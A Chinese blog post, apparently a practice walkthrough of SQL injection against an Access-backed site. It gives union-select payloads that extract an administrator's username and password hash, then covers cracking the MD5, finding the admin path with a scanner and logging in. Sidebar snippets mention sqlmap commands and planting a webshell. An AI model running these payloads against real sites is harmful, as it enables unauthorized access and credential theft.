ACCESS 注入实战

于 2024-08-22 22:02:24 发布
阅读量272 收藏 1
点赞数 5
文章标签: 网络 数据库 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishiqi12/article/details/141436841
版权

简介

        Access数据库注入攻击是一种常见的网络安全,通过注入SQL代码来获取未授权的数据访问权限。这种攻击利用了应用程序与数据库之间的交互漏洞,攻击者通过输入特定的SQL代码片段来操纵数据库查询,从而绕过应用程序的安全机制,获取信息或执行操作。

 以下是具体的操作流程:

1、打开⽹⻚判断是否存在注⼊

使用命令 ?id=14 and 1=1  确定为数字注入

2、使用order by判断列数

当order by 7的时候⻚⾯正常

order by 8的时候⻚⾯报错

最终确定有7列

3、判断表名

  使用语句  ?id=14 and exists(select * from 表名 )

测试不同的表名确定数据是否正确

最终确定为 administrator

4、确定回显位置

使用语句   ?id=14 union select 1,2,3,4,5,6,7 from administrator

 确定回显点位为  2、3、5、7

5、确定用户名及其密码

测试不同的用户名及密码名

使用语句  ?id=14 union select 1,用户名,密码,4,5,6,7 from administrator

这里确定为 user_name 、 password

使用语句为  ?id=14 union select 1,user_name,password,4,5,6,7 from administrator

6、MD5爆破解密

进入MD5页面,输入加密密码,进行解密

加密码为   21232f297a57a5a743894a0e4a801fc3

确定密码为 admin

7、使用御剑工具获取进入后台的路径

点击第一个路径即可进入后台

8、登录后台

输入账户密码即可

安全

网络安全靠人民,网络安全为人民

 

白十七12
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access联合注入实战/Cookie注入/简单WAF绕过
weixin_45118086的博客
03-20 687
Access联合注入实战/Cookie注入/简单WAF绕过 首先来说一下Access与MySQL在语法上存在的小差别。 1、在MySQL中,使用select1,2,3语句配合联合注入,但是在Access中,select语句背后必须跟着表名,此方法不再适用 2、在MySQL中,使用limit语句将union后的查询结果放在前面显示,但是在Access中,越晚查询的结果反而越排在前面,无需使用limit进行特殊处理。 靶场地址:靶场 注意,在cookie注入中,用+代替空格 判断注入点 打开新闻后,界面如下:
实战注入漏洞检测网站.rar
05-08
"实战注入漏洞检测网站.rar"这个压缩包文件很可能是包含了一套用于检测和学习注入漏洞的实际操作平台或者源码。下面,我们将深入探讨注入漏洞的相关知识,以及如何进行检测。 首先,注入漏洞主要分为几种类型: 1....
ACCESS注入实战
2302_77944815的博客
08-20 141
id=11 and exists(select * from 表名)
sqlmap之(三)----Access注入实战
fendo
02-27 1万+
(1) 猜解是否能注入 sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific f
SQL注入实战(防注入)-Access
weixin_47493074的博客
10-01 225
SQL注入实战(防注入)-Access
Access注入之Cookie注入
白帽黑客八哥的博客
05-30 1426
注:Cookie传参值需要URL编码Cookie 是指某些网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie 的出现是为了给用户更好的体验性,从安全的角度来讲,Cookie本身就是不安全的。
Access数据库注入系统拿实战shell(思路笔记)
来到了学渣的博客
04-05 1738
偶尔实战会碰到如下画面,但其实是有方法的。 例子示范: 尝试判断注入,出现防注入系统 而一般数据会记录到sqlin.asp这个页面中 尝试插入一句话马子,把马子url转码一下再传 如图所示 菜刀连接 xxx.xxx.xxx.xxx/sqlin.asp ...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
oracle数据库注入实战,教你oracle注入
weixin_34005394的博客
04-12 851
大家都知道oracle比较大,11g的安装程序大约在1.4g左右,可能大家遇到oracle的库比较少,oracle+jsp的搭配的比较好... oracle系统库默认的用户有sys,system,internal,scott,前三个权限都是system权限.. 先说下数据库的注释:access支持null和%00注释; mssql支持--和;的注视;mysql支持/*的支持;oracle支持--的...
Sqlmap常用命令总结及注入实战Access、mysql)
OKAY_TC的博客
11-19 5万+
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点 2. --dbs 【检测站点包含哪些数据库 3. --current-db 【获取当前的数据库...
Sql注入攻击技术实战
08-10
SQL注入攻击是一种常见的网络安全威胁,主要针对基于Web的应用程序。当程序员在开发应用程序时,如果没有对用户输入的数据进行充分的验证和过滤,攻击者就可以利用这个漏洞,将恶意的SQL语句插入到正常的查询中,...
超级SQL注入工具使用说明书V1.1 20190303.docx
05-03
这款工具不仅支持常见的 Blind 注入(包括Bool型盲注和基于延迟的盲注)、Error注入以及Union注入,还广泛适用于多种数据库系统,如Access、MySQL、SQLServer、Oracle、PostgreSQL、DB2、SQLite以及Informix等。...
实战nginx-全
03-27
1. **模块结构**:理解Nginx模块的基本组成,如handler、filter、access和log等。 2. **C语言基础**:Nginx模块开发通常使用C语言,熟悉基本语法和数据结构。 3. **API接口**:掌握Nginx提供的API接口,如ngx_conf_...
出省了为什么ip地址没变?怎么修改自己的ip地址变外省的
hgdlip的博客
08-14 760
在数字时代,IP地址作为网络世界中每台设备的唯一标识,其重要性不言而喻。然而,许多人在跨省份旅行或工作时,可能会发现尽管自己已经身处新的地域,但IP地址却并未随之改变。这一现象不仅令人困惑,那么,为什么会出现这种情况?我们又该如何修改自己的IP地址以反映当前的外省位置呢?本文将为您详细解答这些问题。
《Cloud Native Data Center Networking》(云原生数据中心网络设计)读书笔记 -- 07数据中心的边缘
最新发布
梆子井欢喜坨的博客
08-21 375
本章将帮助你回答以下问题。
Modbus-TCP——Libmodbus安装和使用(Ubuntu22.04)
计算机硕士的博客
08-21 204
Modbus-TCP——Libmodbus安装和使用。
【qt】基于tcp的消息发送
yyqzjw的博客
08-18 297
我们需要实现客户端发消息,服务端接收消息。
迈威通信Wi-Fi无线交换机:让工业网络打破线缆束缚
Maiwe的博客
08-16 670
为了满足日益增长的无线通信需求,迈威通信专门设计了一款MISCOM7209W-3N25系列二层网管型全千兆双频Wi-Fi卡轨式工业无线PoE交换机,旗下有4款产品,为智能制造和工业互联网的深度融合提供了坚实的网络基石。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值